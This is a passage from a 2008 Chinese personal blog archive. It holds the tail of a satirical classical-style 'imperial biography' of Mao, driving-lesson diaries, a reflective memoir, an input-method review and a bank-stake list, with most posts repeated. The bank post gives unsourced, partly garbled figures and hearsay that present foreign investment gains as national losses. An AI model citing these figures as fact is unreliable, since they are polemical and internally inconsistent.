帝帅余部,转战滇、黔、川诸省。过雪山,与张国焘部合兵,国焘忌帝之官居其右,欲害帝,大将军叶剑英闻信,间道驰告帝,帝得脱。国焘部将陈昌浩欲引兵击帝,大将军徐向前拍案而起,国焘、昌浩乃罢。民朝二十四年入陕,据陕北以抗官军。官军进剿屡败于帝。帝令徐向前率所部西征,败于西北回军,丧师数万,向前等仅以身脱。丙子双十二,帝策反满洲王张学良、陕西镇守使杨虎城兵谏,囚武厉,帝使周文正公谒武厉,晓以大义,武厉罢兵。
民朝二十六年夏,倭寇兵临幽州寻衅,幽州节度使宋哲元与寇战,不克,节度副使佟麟阁、总兵赵登禹殉国,哲元败走保定,倭寇陷幽燕。帝令周文正公再谒武厉,武厉许以招安,北军三万余朱、彭为帅,辖三镇兵马,林彪、贺龙、刘伯诚为总兵。南军两万余叶、项为帅,陈毅等为统制。两军均受帝节制。时当倭军所向披靡,战无不克,独在山西平型关为帝军所败,名震中外。
合官军与倭寇血战八年,民朝三十四年倭寇败降,帝与周文正赴陪都谒武厉,共商国事。民朝三十六年兵火再起,官军伐帝。帝令大将军林彪、罗荣桓取满洲,世祖与大将军刘伯承取中原,大将军陈毅、粟裕取华东,大将军彭德怀取西北,大将军聂荣臻取幽云。帝与周文正公自帅御林军转战陕北。诸军屡败官军。民朝三十七年大将军林、罗与官军战于满洲,大破之,尽占满洲地。世祖、大将军刘与陈、粟部合兵大破官军于徐蚌,陈兵长江,民朝京师震恐。林、罗入关与大将军聂合兵,合围幽州,幽州节度使傅作义降。大将军彭横扫西北,兵临西域。帝移驾幽州,以之为都,改称北京,北方遂定。民朝乞和,帝不许,令世祖与刘、陈、粟诸将合百万众,渡长江,取金陵。以陈、粟取华东,林、罗取华中,世祖与刘将军取西南。诸军势如破竹,官军尽溃不成军。帝以世祖为西南节度使,坐镇成都,以图吐蕃。
武厉败走东海夷州,据澎湖以抗王化。民朝三十八年,太祖武帝开国元年,帝登天安门,诏告天下曰:中国人民从此站起来了!帝定鼎,君临八方。
初,倭寇败降,西夷美利坚助武厉以军资,以抗帝军,帝怒,斥之曰:美帝国主义都是纸老虎。开国元年作《别了,司徒雷登》以示美夷,夷使司徒雷登惭去。开国二年,高丽内乱,南高丽乞师西夷,美夷纠合西夷十五部落进兵北高丽,势如破竹,北高丽溃不成军。酋帅麦克阿瑟狂言饮马鸭绿水。北高丽酋长金日成乞师天朝,帝令西北王彭德怀为东征元帅,太子岸英监军。统兵二十五万,以将军邓华为先行,满洲王高岗为合后。东征高丽。彭公与美夷战,大破之。开国三年,太子阵亡,帝大怒,令彭公进兵,美夷乞和,帝不许,彭公再战,五战五捷,阵斩酋帅沃克,天下皆慑于帝之威。开国五年,彭公平美夷于高丽,班师还朝。
开国初年,帝与周文正公巡幸北狄俄罗斯,与狄酋王斯大林盟,约为兄弟之邦。国经战乱,百废待兴,帝以刘殇公为太师摄政王,周文正公为相国。免天下钱粮。世祖平定西南,传檄吐蕃,吐蕃降。征西将军王震,进兵西域,前朝西域都护陶峙岳降。帝令官军平寇,前朝余孽星散。行三反、五反,斩天津知府刘青山、河北布政使张子善等以清吏治,天下安定。
开国九年行反右,帝定奇计曰:引蛇出洞。初令天下无论军民妇孺皆可谏国事,言政弊。后将直言者尽数收监,交有司论罪。天下儒生遂不敢以古讽今,枉谈国事。行大跃进,民不聊生,饿殍千里,三年饿毙两千余万口。
俄狄发难,帝令翰林作文与俄狄论战。后会诸侯于庐山,大司马兵部尚书彭德怀谏万言书,帝怒,黜彭公,以林幽公代之。野有功高震主,鸟尽弓藏之议。吐蕃喇嘛阴兵起事,帝令军平之,达赖亡命天竺,吐蕃遂定。越数年,天竺入寇藏边,帝命镇藏节度使张国华击之,张公出奇兵越雪山,大破之,俘印军无数,天下无不慑于帝之天威。
开国十二年,天下饥荒,帝与群臣皆不食肉,以示与民共苦。会诸侯于京,曰七千人大会,帝下罪己诏。储君刘殇公曰:三分天灾,七分人祸。帝甚不悦,始有废储之意。
开国十七年,江后令大学士姚文元作《评海瑞罢官》,帝曰:阶级斗争一抓就灵!开国十八年,太祖武皇帝文革元年,天下大乱,帝于五月十六日下诏,改元文革。文革始起。林庄幽公赞太祖曰:大海航行靠舵手~~~陛下一句顶一万句~~~令天下无论妇孺老幼皆习帝之语录,舞忠字舞。每日晨起为帝作三忠于、四无限。各家均供奉帝之像,各地为帝立生祠。有山野之人作歌曰:爹亲娘亲不如陛下亲~~~帝大喜,遂立林公为储君,封摄政王,出入免跪拜。百万红卫于天安门拜谒帝,自林庄幽公、周相国等皆顿首叩拜,山呼万岁。帝下挟书律,妖言令,罢科举,焚诸子书,禁百家言。以共产之学为国学,以愚黔首。臣民偶语诗书、以古讽今者,或弃市,或收监,或黥为城旦。帝名为文革,实为灭功臣之意。
开国初,帝以高岗为东北王,饶漱石为华东王,刘伯承为西南王,林彪为中南王,彭德怀为西北王,诸王势力,人莫能及。帝行削藩策,废高、饶,以林、彭、刘等主军机,因功臣俱在,帝甚忌之,故先废高、饶,再废彭公,又以文革为名,阴使江后与林庄幽公结党戮功臣,摄政王刘殇公请乞骸骨,帝不许,后幽刘殇公于开封,密不发丧。十年大乱,计废功臣名将贺、彭等无算。
文革六年,再会诸侯于庐山,林公令大学士陈伯达谏,欲加帝尊号,帝不许。有废储之意。摄政王林庄幽公不得已谋叛,欲弑帝。帝令周文正公平叛,林公北逃,与王妃叶群、王世子立果均身死漠北。帝诏上海知府王洪文入京,加王爵。欲立为储君,因周相国、朱太师等勋臣力谏乃罢。后王洪文与江后、左丞相张春桥、大学士姚文元等结党,或受帝命,或矫诏陷害忠良。朝野共恶此四人,称之为四人帮。
文革十一年,相国周文正公薨,天下悲泣,京师万民送葬。是年四月,京师百姓进言,请加周相国尊号,配享太庙。江后不许,引发清明京师民变,江后与皇侄远新进谗言。帝以为世祖所谋,黜世祖。七月,太师朱武胜公薨,未几,地大震于唐山,丧丁二十余万口。
帝自林庄幽公之乱后,龙体日衰。文革十一年,天降星雨于吉林,地大震于唐山,民以为上将归天,人心惶惶。帝废世祖职,以右丞相华国锋为储君,赐遗诏曰:你办事,我放心。以大司马兵部尚书叶剑英为辅政王,仿刘蜀主托孤之意,委政于叶公。九月九日帝崩于寝宫,寿八十三岁,天下色变,亿万臣民俱悲,如丧考妣。国锋即位,是为废帝,新君葬太祖于天安门前,号曰:至圣革命真龙伟大导师伟大领袖伟大统帅伟大舵手太祖武皇帝。
太祖文韬武略,历代帝王所不及也。太祖文传于《太祖选集》及《太祖语录》中,诗存于《太祖诗词选》,皆官修定稿。
太祖后三人,杨后开慧,为太祖结发妻,因太祖起事,亡于前朝。贺后子珍,因不敬之罪,贬为庶民。李后云鹤又称江青,因阴结其党,欲废新君华国锋,效武则天事,为大司马辅政王叶公所废,后自缢于室。太子岸英,公子岸青,岸龙为杨后所生,公主李敏为贺后所生,公主李讷为李后所生。太子岸英阵亡,岸龙早夭,起事之时,又有子女数人,失于乱中,不知所终。诸嫔妃或有生子女者,皆不得知也。帝家有清贫之风,公子岸青,公主李讷、李敏均为布衣,唯皇孙新宇,举进士,入翰林,供职太学。
未名野人论曰:吾本燕园卑微一书生,诚惶诚恐,效董狐作良史,太史公作史记,斗胆为太祖作传。才疏学浅,无生花之笔。鄙陋之文难登大雅,故现于网络。太祖与前朝思宗武厉皇帝共逐倭奴,雪中华百年之耻。后太祖一统大业,东击美夷,北拒沙俄、西退天竺、南败越蛮诸国,扬我大汉之威;白手起家,创建百业,更研爆核弹于大漠,奠千秋之业。奈何太祖行事尤效汉高、明祖,除异己、戮功臣、兴文字狱,天下混沌。然帝坚持学、医、水利等公共福利由朝廷承担,不加民捐,至今为民所念。
帝之功过尽在民心,桃李不言,下自成蹊。
呜呼,古人作事无巨细,寂寞豪华皆有意。书生轻议冢中人,冢中笑尔书生气
2008年4月10日星期四
稳定行驶的爽快
从南部山区开车回来,教练只有关键的几个地方提醒一下,全程让我一个人开着,速度基本稳定在60,大量的山路弯道坡道,路边行人,多次的超车会车红绿灯,需要不停处理各种各样的情况,但速度基本恒定,感觉比较爽。
练到第三天,心里基本有底了,似乎明天去路考也没问题,可能车的原因,比原来练的那辆好开,坐上去有感觉。上车先调好座椅,系好安全带,其余的步骤总结了5点:一踩、二挂、三拨、四摁、五走、六踩离合,挂一档,拨左转向灯,摁喇叭,松手刹,松离合同时加油门,平稳起步。停的时候,松油门,打闪光,踩刹车,减档,最后靠边停住,拉手刹,置空档,关闪光,熄火,置一档,下车关门,操作结束
晚上哄孩子,换尿布,赶紧撤了
练到第三天,心里基本有底了,似乎明天去路考也没问题,可能车的原因,比原来练的那辆好开,坐上去有感觉。上车先调好座椅,系好安全带,其余的步骤总结了5点:一踩、二挂、三拨、四摁、五走、六踩离合,挂一档,拨左转向灯,摁喇叭,松手刹,松离合同时加油门,平稳起步。停的时候,松油门,打闪光,踩刹车,减档,最后靠边停住,拉手刹,置空档,关闪光,熄火,置一档,下车关门,操作结束
晚上哄孩子,换尿布,赶紧撤了
大量的马路杀手诞生了
昨天去考桩,原来很是紧张,总觉有些地方还没有把握,没有练到完美的程度,结果到现场一看,大量的学员更差,原地打把,倒桩时多次熄火,起启步经常熄火,转来转去没有方向感,甚至很多正在考九项的,看上去还不如我们第一天学车的水平。感慨之余就想,马路上得有多少这样的杀手啊,以后一定得躲着点儿,看看正在考试的准司机,就知道走在路上有多危险了。我以全放开一档的速度倒桩,可以顺利完成,这样尚且紧张的要命,生怕过不了关。他们夸张到和蚂蚁爬的速度,20来分钟才能完成,有的还撞杆出线,老荣一个劲儿说呢,这样的水平都敢来考试,咱怕啥呢?
倒时希望严格些,再严格些,过不了关多练练就是了。要是水平达不到,却去糊弄个驾照,以后出了问题,损失自己影响别人,更会出大问题,还不如严格些好。现在的考试难度还是太低,应该再难一些,过关率再低一些,减少马路杀手,降低小汽车拥有量,对交通对环境都有很大好处。
倒时希望严格些,再严格些,过不了关多练练就是了。要是水平达不到,却去糊弄个驾照,以后出了问题,损失自己影响别人,更会出大问题,还不如严格些好。现在的考试难度还是太低,应该再难一些,过关率再低一些,减少马路杀手,降低小汽车拥有量,对交通对环境都有很大好处。
2008年4月8日星期二
一点儿统计数据
银行资产流失统计
1,中国工商银行
2006年,美国高盛集团、德国安联集团及美国运通公司出资37.8亿美元(折合人民币约295亿)入股工商银行,收购工行约10%的股份,收购价格1.16元。上市后,按照2007年1月4日盘中价格6.77元计算,市值最高达到2755亿元,三家外资公司净赚2460亿元人民币,不到一年时间投资收益9.3倍,世界罕见。
2,中国银行
苏格兰皇家银行、新加坡淡马锡控股、瑞银集团和亚洲开发银行投资中国银行共51.75亿美元(合人民币约403亿),收购价格1.22元。上市后,按照2007年5月10日盘中价格6.26元计算,市值最高达到2822亿元,四家外资公司净赚2419亿元人民币,不到一年时间投资收益6.6倍。
3,兴业银行
2006年,香港恒生银行、新加坡新政泰达和国际金融公司赚共出资27亿,以每股2.7元的价格购入兴业银行10亿股,上市后,股价达到37元多,三家外资公司净赚约370亿。根据2007年2月12日《参考消息》报道,以后每年都有300%以上回报。该银行上市募集资金共159.95亿,等于全部送给了三家外资公司。该银行国内发行价格每股15.98,吸引的网上网下申购资金高达11610亿。
4,深圳发展银行
美国新桥投资集团以每股3.5元购买深圳发展银行3.481股,目前股价已达35.8元,投资增殖10倍,按照深发展20亿多股计算,新桥用12.18亿获得了700多亿,。根据新桥目前的做法,很快将达到1000亿元。而新桥集团本身就是庄家,根本不是银行,如何能改善我国银行治理结构?况且整个银行都被美国人拿走了,即便改善对我国又有什么意义?
5,华夏银行
德意志银行和萨尔•奥彭海姆银行联合组成的财团将出资26亿元人民币,购入华夏银行约5.872亿股份,占华夏银行总股数的14%。每股价格4.5元,现在近14元,净赚56亿多人民币。目前已被德国银行控股,500亿落入对方手中。目前德国人对华夏已形成了联合控股,该银行名义上还是中国银行,实际已成为外资控股银行。
6,中国交通银行
汇丰银行(汇丰)持股交行19.9%的股权,出资144.61亿元购买91.15亿股,每股为1.86元。交行2006年5月在香港上市,现在市价超过10港元,净赚近800多亿,07年国内A股发行上市又赚取500多亿,合计将近1400亿,10倍回报。
7,中国建设银行
上市前,美国银行和淡马锡公司分别斥资25亿美元和14.66亿美元购买建行9%和5.1%的股权,每股定价约0.94元港币。发行价格2.35元港币,最高市价5.35元港币。按照目前建行共有2247亿股计算,2家净赚1300多亿港币。
8,浦东发展银行
花旗集团出资6700万美元收购浦发行4.62%的股份,超过1.8亿股,每股约2.96元,并且协议规定日后花旗集团有权收购19.9%的股份。目前浦发行股价超过38元,花旗净赚62亿元。目前花旗尚未行权,一旦行权将赚取62亿的数倍。
9,民生银行
2004年,淡马锡控股旗下的亚洲金融公司以1.1(约8亿人民币)亿美元的价格收购民生银行2.36亿股股份,占民生银行总股份的4.55%,约3.72元,目前该股已达12元多,加上两年送配,市值已达50亿元,净赚约40亿。
(上述交易低价转让外资净赚约9200多亿,加上广发行,损失超过1万亿人民币,其中绝大部分是2006年一年转让的损失,再加上已经全部完成合资的等待上市的几十家地方银行,未来损失将越来越惊人)
10,广东发展银行
2006年美国花旗银行以联合收购的名义,自己出资不过60亿,就控制了拥有3558亿元总资产、27家分行、502家网点,与世界83个国家和地区917家银行具有代理行关系,连续多年位列全球银行500强的广东发展银行。并且中国移动、国家电网和中国信托还各搭进去60亿,共180亿。把银行白白送人还要再搭进去180亿,已经完全超越了市场交换的范畴。
11,渤海银行及地方银行
另外,2005年挂牌成立的我国第一家股份制银行――渤海银行宣布,渣打银行以1.23亿美元购入即将成立的渤海银行19.9%的股份,成为其第二大股东。除了参股渤海银行之外,渣打银行参股光大银行有望在今年年底前完成。目前,外资银行在华进入了加速发展期,中国全部银行无一例外地已被18家外资银行参股或控股。
12,中国平安保险股份有限公司
平安是中国第一家股份制保险公司,也是第一家引进外资的保险公司,汇丰集团是平安最大外资股东,汇丰是2002年投资6亿美元,50亿人民币投资平安;平安集团04年6月24日在香港成功上市,发行价11.88港元,目前已上升到40元港币。今年2月又募集A股资金388亿。截至2006年6月30日,集团总资产为人民币3,587.18亿元,权益总额为人民币381.04亿元。目前,公司市值近2000亿港元,A股5500亿人民币。
13,新华人寿
新华人寿即将上市,现在苏黎世保险持有新华人寿22800万股,每股5.25元,持股比例为19%,已成为新华人寿的最大单一股东。但实际上,目前新华人寿的实际控制者是东方集团,由于东方实业和东方集团分别持有新华人寿5%和8.02%的股权,再加上东方集团持有新华人寿其他股东的股权,东方集团直接或间接持有新华人寿的股权肯定超过20%。(据说,苏黎世通过中国公司暗中控股已超过56%,投资34亿,一旦上市,市值至少600亿)
1,中国工商银行
2006年,美国高盛集团、德国安联集团及美国运通公司出资37.8亿美元(折合人民币约295亿)入股工商银行,收购工行约10%的股份,收购价格1.16元。上市后,按照2007年1月4日盘中价格6.77元计算,市值最高达到2755亿元,三家外资公司净赚2460亿元人民币,不到一年时间投资收益9.3倍,世界罕见。
2,中国银行
苏格兰皇家银行、新加坡淡马锡控股、瑞银集团和亚洲开发银行投资中国银行共51.75亿美元(合人民币约403亿),收购价格1.22元。上市后,按照2007年5月10日盘中价格6.26元计算,市值最高达到2822亿元,四家外资公司净赚2419亿元人民币,不到一年时间投资收益6.6倍。
3,兴业银行
2006年,香港恒生银行、新加坡新政泰达和国际金融公司赚共出资27亿,以每股2.7元的价格购入兴业银行10亿股,上市后,股价达到37元多,三家外资公司净赚约370亿。根据2007年2月12日《参考消息》报道,以后每年都有300%以上回报。该银行上市募集资金共159.95亿,等于全部送给了三家外资公司。该银行国内发行价格每股15.98,吸引的网上网下申购资金高达11610亿。
4,深圳发展银行
美国新桥投资集团以每股3.5元购买深圳发展银行3.481股,目前股价已达35.8元,投资增殖10倍,按照深发展20亿多股计算,新桥用12.18亿获得了700多亿,。根据新桥目前的做法,很快将达到1000亿元。而新桥集团本身就是庄家,根本不是银行,如何能改善我国银行治理结构?况且整个银行都被美国人拿走了,即便改善对我国又有什么意义?
5,华夏银行
德意志银行和萨尔•奥彭海姆银行联合组成的财团将出资26亿元人民币,购入华夏银行约5.872亿股份,占华夏银行总股数的14%。每股价格4.5元,现在近14元,净赚56亿多人民币。目前已被德国银行控股,500亿落入对方手中。目前德国人对华夏已形成了联合控股,该银行名义上还是中国银行,实际已成为外资控股银行。
6,中国交通银行
汇丰银行(汇丰)持股交行19.9%的股权,出资144.61亿元购买91.15亿股,每股为1.86元。交行2006年5月在香港上市,现在市价超过10港元,净赚近800多亿,07年国内A股发行上市又赚取500多亿,合计将近1400亿,10倍回报。
7,中国建设银行
上市前,美国银行和淡马锡公司分别斥资25亿美元和14.66亿美元购买建行9%和5.1%的股权,每股定价约0.94元港币。发行价格2.35元港币,最高市价5.35元港币。按照目前建行共有2247亿股计算,2家净赚1300多亿港币。
8,浦东发展银行
花旗集团出资6700万美元收购浦发行4.62%的股份,超过1.8亿股,每股约2.96元,并且协议规定日后花旗集团有权收购19.9%的股份。目前浦发行股价超过38元,花旗净赚62亿元。目前花旗尚未行权,一旦行权将赚取62亿的数倍。
9,民生银行
2004年,淡马锡控股旗下的亚洲金融公司以1.1(约8亿人民币)亿美元的价格收购民生银行2.36亿股股份,占民生银行总股份的4.55%,约3.72元,目前该股已达12元多,加上两年送配,市值已达50亿元,净赚约40亿。
(上述交易低价转让外资净赚约9200多亿,加上广发行,损失超过1万亿人民币,其中绝大部分是2006年一年转让的损失,再加上已经全部完成合资的等待上市的几十家地方银行,未来损失将越来越惊人)
10,广东发展银行
2006年美国花旗银行以联合收购的名义,自己出资不过60亿,就控制了拥有3558亿元总资产、27家分行、502家网点,与世界83个国家和地区917家银行具有代理行关系,连续多年位列全球银行500强的广东发展银行。并且中国移动、国家电网和中国信托还各搭进去60亿,共180亿。把银行白白送人还要再搭进去180亿,已经完全超越了市场交换的范畴。
11,渤海银行及地方银行
另外,2005年挂牌成立的我国第一家股份制银行――渤海银行宣布,渣打银行以1.23亿美元购入即将成立的渤海银行19.9%的股份,成为其第二大股东。除了参股渤海银行之外,渣打银行参股光大银行有望在今年年底前完成。目前,外资银行在华进入了加速发展期,中国全部银行无一例外地已被18家外资银行参股或控股。
12,中国平安保险股份有限公司
平安是中国第一家股份制保险公司,也是第一家引进外资的保险公司,汇丰集团是平安最大外资股东,汇丰是2002年投资6亿美元,50亿人民币投资平安;平安集团04年6月24日在香港成功上市,发行价11.88港元,目前已上升到40元港币。今年2月又募集A股资金388亿。截至2006年6月30日,集团总资产为人民币3,587.18亿元,权益总额为人民币381.04亿元。目前,公司市值近2000亿港元,A股5500亿人民币。
13,新华人寿
新华人寿即将上市,现在苏黎世保险持有新华人寿22800万股,每股5.25元,持股比例为19%,已成为新华人寿的最大单一股东。但实际上,目前新华人寿的实际控制者是东方集团,由于东方实业和东方集团分别持有新华人寿5%和8.02%的股权,再加上东方集团持有新华人寿其他股东的股权,东方集团直接或间接持有新华人寿的股权肯定超过20%。(据说,苏黎世通过中国公司暗中控股已超过56%,投资34亿,一旦上市,市值至少600亿)
2008年4月6日星期日
一段回忆
有时想停下手边的忙碌,写一写那段有趣的经历。
年少的时候 ,有一个平淡无奇的生活,可能一辈子都这样平平淡淡的过活,忽然有一天遇到自认为是天大的困难,出去寻找机会,认识了些人,得到了某些机会,认识到竟然可以做这些事,可以把原来想像中非常困难的事情轻易地完成,可以由此得到非常多的快乐,象是忽然发现了大宝藏,忽然中了彩票大奖,一下子拥了巨大的财富。
由这个起点,开始挑战一个个的困难,完成一个个目标,得到了越来越多的收获,越来越多的快乐。在这样年轻的年纪回忆这些也许并不合适,但这些日子停顿下来,忽然想找一个以后的目标,想确定以后的生活怎么过,让自己重新变的坚强勇敢,这样回忆一下也好,至少那一段时间成功,得到了不少收获,可以让以后的工作生活明确起来,不再象前一段时间那样浑浑噩噩,找不到方向,整天迷茫抱怨,过的越来越失败了。
成功的模式都是这样。开始的平淡,遇到某些困难,开始寻找机会,主观上的困难感觉无限大,尝试着去解决,也没什么大不了,很快找到一些机会和资源,逐步解决掉眼前的困难,站的更高,看的更远了,又主动碰上另一个困难,然后解决,然后再碰上另一个。人生就是这样周而复始,碰上问题,解决,再碰上,象是完成一次次的磨砺,这样的成功让人快乐而充实。
年少的时候 ,有一个平淡无奇的生活,可能一辈子都这样平平淡淡的过活,忽然有一天遇到自认为是天大的困难,出去寻找机会,认识了些人,得到了某些机会,认识到竟然可以做这些事,可以把原来想像中非常困难的事情轻易地完成,可以由此得到非常多的快乐,象是忽然发现了大宝藏,忽然中了彩票大奖,一下子拥了巨大的财富。
由这个起点,开始挑战一个个的困难,完成一个个目标,得到了越来越多的收获,越来越多的快乐。在这样年轻的年纪回忆这些也许并不合适,但这些日子停顿下来,忽然想找一个以后的目标,想确定以后的生活怎么过,让自己重新变的坚强勇敢,这样回忆一下也好,至少那一段时间成功,得到了不少收获,可以让以后的工作生活明确起来,不再象前一段时间那样浑浑噩噩,找不到方向,整天迷茫抱怨,过的越来越失败了。
成功的模式都是这样。开始的平淡,遇到某些困难,开始寻找机会,主观上的困难感觉无限大,尝试着去解决,也没什么大不了,很快找到一些机会和资源,逐步解决掉眼前的困难,站的更高,看的更远了,又主动碰上另一个困难,然后解决,然后再碰上另一个。人生就是这样周而复始,碰上问题,解决,再碰上,象是完成一次次的磨砺,这样的成功让人快乐而充实。
不是我在发呆,是这世界变化太快
不是我在发呆,是这世界变化太快。才一个晚上的时间,我同学的电动车又丢了,和我当时丢的时候一样,前一天晚上放在楼下,第二天早上就不见了踪影,效率真是惊人啊。是不是这些小偷每天都要巡视若干的小区,只要有可下手的情况,马上就会动手了,看上去,比片警可勤快多了。共同点都是我们都没有见过这些人,都不认识这些每天惦记着管辖范围的服务人员。
刚一丢车,恨不得掘地三尺,找遍世界每个角落,这些小偷太可气了,动手也太快了,报了案也根本没有效果,许多人干脆也不去费那个劲了,在院子里转了几圈,只得望天长叹了。
第一次坐在车上,加速到六七十公里的时速,新鲜刺激,手都不知道往哪儿放了。第二天总算找到点儿感觉,可以自如地加档减档了,随着车子在自己的控制下快慢变化,信心也空前鼓胀起来。上坡起步没问题了,现在的问题主要在于靠边停车时,总是忘了打方向灯。应该在听到口令后,打方向灯观察后视灯给予回应,然后再刹车减速,变档停靠,最后手刹,关方向灯,空档,熄火。熟悉的太慢,这几在熬夜搞的提不起精神头,总是昏昏欲睡,熟悉进度慢了不少。
刚一丢车,恨不得掘地三尺,找遍世界每个角落,这些小偷太可气了,动手也太快了,报了案也根本没有效果,许多人干脆也不去费那个劲了,在院子里转了几圈,只得望天长叹了。
第一次坐在车上,加速到六七十公里的时速,新鲜刺激,手都不知道往哪儿放了。第二天总算找到点儿感觉,可以自如地加档减档了,随着车子在自己的控制下快慢变化,信心也空前鼓胀起来。上坡起步没问题了,现在的问题主要在于靠边停车时,总是忘了打方向灯。应该在听到口令后,打方向灯观察后视灯给予回应,然后再刹车减速,变档停靠,最后手刹,关方向灯,空档,熄火。熟悉的太慢,这几在熬夜搞的提不起精神头,总是昏昏欲睡,熟悉进度慢了不少。
2008年4月3日星期四
换了一种新的输入法
使用过智能陈桥五笔,万能五笔,微软拼音五笔,极品五笔,还有若干想不想名字来的输入法,今天换到极点五笔,感觉基本算定下来了,以后一段时间就用它了,这个输入法确实太棒了。详细的介绍可以从网上找到,不作多,只说选择了这么多次以后,才算是真正找到一种最方便使用的输入法。
智能陈桥五笔不免费,默认安装的插件多,这是最让人讨厌外的。其它的一些功能,也不如极点五笔。
万能五笔速度太慢
微软五笔拼音刚开始用感觉还行,后来发现词组问题不爽,大大影响输入速度。
极品五笔用了一段时间,感觉还是不错的,但没有自动的拼音输入,有时碰到不会的词句,难免卡一下,影响思路。
极点五笔拼音五笔都能迅速切换,自动提示五笔编码,中英文切换也非常方便,大量而方便管理的词组库,繁体输入,体积很小,速度很快。以后就用它了。
智能陈桥五笔不免费,默认安装的插件多,这是最让人讨厌外的。其它的一些功能,也不如极点五笔。
万能五笔速度太慢
微软五笔拼音刚开始用感觉还行,后来发现词组问题不爽,大大影响输入速度。
极品五笔用了一段时间,感觉还是不错的,但没有自动的拼音输入,有时碰到不会的词句,难免卡一下,影响思路。
极点五笔拼音五笔都能迅速切换,自动提示五笔编码,中英文切换也非常方便,大量而方便管理的词组库,繁体输入,体积很小,速度很快。以后就用它了。
订阅:
博文 (Atom)